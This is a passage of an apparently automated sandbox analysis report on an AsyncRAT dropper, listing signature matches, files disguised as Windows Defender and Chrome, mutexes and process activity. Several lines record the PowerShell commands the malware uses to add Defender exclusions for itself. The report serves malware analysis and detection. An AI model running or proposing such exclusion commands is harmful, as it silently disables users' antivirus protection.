                        Source: powershell.exe, 00000006.00000002.1685428644.000002D229630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1685721301.000002D22983D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\Desktop\X.exeCode function: 0_2_00007FFAAB780A310_2_00007FFAAB780A31
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB79208D2_2_00007FFAAB79208D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAB8430E96_2_00007FFAAB8430E9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAB8630E99_2_00007FFAAB8630E9
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 11_2_00007FFAAB7A16E911_2_00007FFAAB7A16E9
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 11_2_00007FFAAB7A0E5E11_2_00007FFAAB7A0E5E
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 11_2_00007FFAAB7A20C111_2_00007FFAAB7A20C1
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 12_2_00007FFAAB7A16E912_2_00007FFAAB7A16E9
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 12_2_00007FFAAB7A0E5E12_2_00007FFAAB7A0E5E
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeCode function: 12_2_00007FFAAB7A20C112_2_00007FFAAB7A20C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFAAB8730E920_2_00007FFAAB8730E9
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 22_2_00007FFAAB7A16E922_2_00007FFAAB7A16E9
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 22_2_00007FFAAB7A0E5E22_2_00007FFAAB7A0E5E
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 22_2_00007FFAAB7A20C122_2_00007FFAAB7A20C1
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 25_2_00007FFAAB7B16E925_2_00007FFAAB7B16E9
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 25_2_00007FFAAB7B0E5E25_2_00007FFAAB7B0E5E
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeCode function: 25_2_00007FFAAB7B20C125_2_00007FFAAB7B20C1
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Windows Defender.exe 576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
                        Source: X.exeStatic PE information: No import functions for PE file found
                        Source: X.exe, 00000000.00000002.1747299745.000000000410D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGoogle Chrome.exe4 vs X.exe
                        Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGoogle Chrome.exe4 vs X.exe
                        Source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Google Chrome.exe.0.dr, EPF8Pua7qdV0S9h4vNzRF9epgA0dMGa.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, EPF8Pua7qdV0S9h4vNzRF9epgA0dMGa.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                        Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                        Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                        Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@36/35@3/1
                        Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\X.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMutant created: \Sessions\1\BaseNamedObjects\nk4GrQt4g7tiU7a0
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
                        Source: C:\Users\user\Desktop\X.exeMutant created: \Sessions\1\BaseNamedObjects\gYH9wmx6Oq2bUbIgm
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMutant created: \Sessions\1\BaseNamedObjects\WR2rJvQsDgMo0fED
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
                        Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Defender.exeJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
                        Source: X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: X.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                        Source: C:\Users\user\Desktop\X.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: X.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\X.exe "C:\Users\user\Desktop\X.exe"
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Users\user\Desktop\X.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\X.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
